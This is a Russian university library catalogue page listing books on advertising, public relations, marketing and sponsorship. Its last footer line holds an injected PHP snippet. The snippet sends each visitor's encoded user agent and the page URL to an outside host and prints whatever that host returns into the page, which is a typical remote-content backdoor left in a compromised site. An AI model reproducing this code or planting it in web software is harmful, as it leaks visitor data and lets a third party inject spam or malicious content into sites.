Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

47 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=СПОНСОРСТВО")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 61
1. 
Дейан, Арман. Реклама [Текст] / А. Дейан; Пер. с фр. В. А. Петрова, Под ред. С. Г. Божук, 2003. - 126 с.
2. 
Тульчинский, Григорий Львович. Менеджмент в сфере культуры [Текст] : Учеб. пособие для вузов по специальности "Культурология" / Г. Л. Тульчинский, Е. Л. Шекова, 2003. - 527 с.
Держатели документа (Информация об экземплярах) 

Данное учебное пособие предназначено для студентов вузов, изучающих менеджмент в <социально>-<культурной> <сфере>.

Новые социально-экономические условия требуют переосмысления имеющегося опыта управления сферой культуры, совершенствования механизма планирования, привлечения средств, рекламной деятельности, работы с персоналом и т. д. Эти вопросы всесторонне рассматриваются в настоящем учебном пособии.

3. 
Ромат, Евгений Викторович. Реклама [Текст] / Е. В. Ромат, 2003. - 556 с.
Держатели документа (Информация об экземплярах) 

В книге проведен глубокий и всесторонний анализ такой динамичной, быстро трансформирующейся сферы человеческой деятельности, как реклама. Подробно изучаются рекламные коммуникации и их основные элементы, процессы формирования рекламного обращения и выбор каналов его распространения, значительное внимание уделяется проблемам и перспективам рекламного менеджмента.

Учебник предназначен для студентов экономических вузов, изучающих маркетинг, менеджмент, паблик рилейшнз. Большое количество иллюстративного материала, примеров из отечественной и зарубежной практики делают эту книгу полезной для специалистов, работающих в рекламном бизнесе.

4. 
Джефкинс, Фрэнк. Паблик рилейшнз [Текст] : Учеб. пособие для вузов по специальности 350400 "Связи с общественностью" / Ф. Джефкинс, Д. Ядин; Пер. с англ. под ред. Б. Л. Еремина, 2003. - 400 с.

За последнее десятилетие понятие "паблик рилейшнз" прочно вошло в словарь современного делового языка.

Фрэнк Джефкинс - один из тех людей, которые во многом придали паблик рилейшнз его нынешний облик, свели его содержание в строгую систему, с одной стороны, отграничили это направление от смежных областей, а с другой - показали те сферы, где эти области действуют совместно. Всесторонность, компактность и глубина изложения сделали книгу очень популярной во многих странах. Это базовый учебник для многих учебных заведений. После смерти Джефкинса книгу дорабатывал Д. Ядин.

Для студентов, аспирантов и преподавателей вузов, специалистов PR-агенств и PR-отделов, руководителей предприятий и организаций, а также для всех, кто интересуется проблемами связей с общественностью.

5. 
Самые успешные PR-кампании в мировой практике [Текст] : Пер. с англ., 2002. - 309 с.
6. 
Аакер, Дэвид. Бренд-лидерство: новая концепция брендинга [Текст] / Д. Аакер, Э. Йохимштайлер; Пер. с англ.: Н. В. Кияченко и др., 2003. - 374 с.
Держатели документа (Информация об экземплярах) 
7. 
Дымшиц, Михаил Наумович. Манипулирование покупателем [Текст] / М. Н. Дымшиц, 2004. - 251, [1] с.
Держатели документа (Информация об экземплярах) 
8. 
Даулинг, Грэм. Репутация фирмы: создание, управление и оценка эффективности [Текст] / Г. Даулинг; Пер. с англ. А. В. Кузнецова, 2003. - 366, [1] с.
Держатели документа (Информация об экземплярах) 
9. 
Котлер, Филип. Маневры маркетинга. Современные подходы к прибыли, росту и обновлению [Текст] / Ф. Котлер, Д. К. Джайн, С. Мэйсинси; Пер. с англ. Т. Гутниковой, 2003. - 210 с.
Держатели документа (Информация об экземплярах) 
10. 
Котлер, Филип. Маркетинг от А до Я [Текст] : 80 концепций, которые должен знать каждый менеджер / Ф. Котлер; Пер. с англ. Т. В. Виноградова и др.; Под ред. Т. Р. Тэор, 2003. - 219 с.
Держатели документа (Информация об экземплярах) 
11. 
Харрисон, Ширли. Связи с общественностью. Вводный курс [Текст] / Ш. Харрисон; Пер. с англ. В. П. Елизарова; Под ред. Г. Е. Алпатова, 2003. - 364 с.
Держатели документа (Информация об экземплярах) 

Одним из необходимых условий успеха любого бизнеса является безупречная репутация и положительный имидж в глазах ее партнеров и клиентов. О том, как сформировать этот образ наиболее эффективно рассказывается в этой книге. Прочитав ее, вы узнаете, как правильно выстроить свою PR стратегию на рынке, как грамотно вести дела со средствами массовой информации и в условиях ограниченного бюджета добиться наилучших результатов.

Данная работа станет идеальной отправной точкой для тех, кто только начинает изучать основные принципы работы в сфере PR, будет полезна опытным практикующим специалистам в области маркетинга, рекламы и паблик рилейшнз, а студентам вузов послужит незаменимым учебным пособием .

12. 
Библиотеки, социальное партнерство, благотворительность [Текст] / ГПНТБ России, 1999. - 19 с.
Держатели документа (Информация об экземплярах) 
13. 
Комплексное взаимодействие библиотеки с общественностью [Текст] : (Метод. пособие) / Российская научно-техническая промышленная библиотека, 2001. - 8 с.
Держатели документа (Информация об экземплярах) 
14. 
Ромат, Евгений Викторович. Реклама [Текст] : Учеб. для специальности "Маркетинг" / Е. В. Ромат, 2000. - 479 с.
Держатели документа (Информация об экземплярах) 
15. 
Досуг. Творчество. Культура [Текст] : Сб. науч. тр. / Сиб. фил. Рос. ин-та культурологии и др, 2002. - 176 с.
Держатели документа (Информация об экземплярах) 
16. 
Ромат, Евгений Викторович. Реклама [Текст] : Учеб. для вузов / Е. В.Ромат, 2002. - 544 с.
Ключевые слова 
МАРКЕТИНГОВАЯ КОММУНИКАЦИЯ -- РЕКЛАМНОЕ ОБРАЩЕНИЕ -- РЕКЛАМНЫЙ МЕНЕДЖМЕНТ -- РЕКЛАМНАЯ ДЕЯТЕЛЬНОСТЬ -- УЧЕБНИК И ПОСОБИЕ -- МАРКЕТИНГ - ИНТЕРНЕТ -- ИНТЕРНЕТ - МАРКЕТИНГ -- МАРКЕТИНГ ПРЯМОЙ -- ПАБЛИК РИЛЕЙШНЗ -- СБЫТ -- Промоушн -- Брендинг -- СТИЛЬ ФИРМЕННЫЙ -- СЛОГАН -- ЗНАК ТОВАРНЫЙ -- Герой корпоративный -- СПОНСОРСТВО -- ВЫСТАВКА -- ЯРМАРКА -- мерчандайзинг -- Маркетинг отношений -- ОБРАЩЕНИЕ РЕКЛАМНОЕ -- Креатив -- РЕКЛАМА ПЕЧАТНАЯ -- Реклама экранная -- РАДИОРЕКЛАМА -- Реклама наружная -- Реклама компьютерная -- Медиапланирование -- МЕНЕДЖМЕНТ рекламный -- ИССЛЕДОВАНИЕ рекламное -- ПЛАНИРОВАНИЕ МАРКЕТИНГОВОЕ -- Стратегия рекламная -- Служба маркетинга -- БЮДЖЕТ рекламный -- АГЕНТСТВО РЕКЛАМНОЕ -- КАМПАНИЯ РЕКЛАМНАЯ -- Контроль рекламы -- Контроль внутрифирменный -- РЕГУЛИРОВАНИЕ рекламы -- РЕКЛАМА - Словарь терминов
17. 
Тульчинский, Григорий Львович. PR фирмы: технология и эффективность [Текст] / Г. Л.Тульчинский, 2001. - 292, [2] с.
Держатели документа (Информация об экземплярах) 
18. 
Маслова, Татьяна Дмитриевна. Маркетинг [Текст] : Учеб. по специальности 060800 "Экономика и управление на предприятии" / Т. Д. Маслова, С. Г. Божук, Л. Н. Ковалик, 2002. - 397 с.

В учебнике подробно и со многими информативными примерами изложены основные вопросы, изучаемые в курсе "Маркетинг". Рассмотрены цели, задачи, принципы маркетинга, его перспективы. Значительное внимание уделено <маркетинговым исследованиям>, <товарной>, <ценовой>, <коммуникационной> и <сбытовой> <политике>.

19. 
Оганесян, Анна Арменаковна. Рекламная деятельность [Текст] : Конспект лекций / А. А. Оганесян, 2002. - 160, [1] с.
Держатели документа (Информация об экземплярах) 
20. 
Энциклопедия международных благотворительных фондов и организаций, 1999 [Текст] / А. Чиркиниан, 1999. - 476 с.
Ключевые слова 
Благотворительность -- Энциклопедия -- Благотворительный фонд -- Меценатство -- Спонсорство -- Фонд благотворительный -- Организация благотворительная -- Грант -- Стипендия -- Культура -- Искусств0 -- Спорт -- Туризм -- Медицина -- Здравоохранение -- Наука -- Техника -- Сельское хозяйство -- Образование -- Охрана окружающей среды -- Экология -- Политика -- Международные отношения -- Правозащита -- Средства массовой информации -- Промышленность -- Предпринимательство -- Экономика -- Социальная защита
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3078 - 13.11.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.28 с.12 запросов, 0.84c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;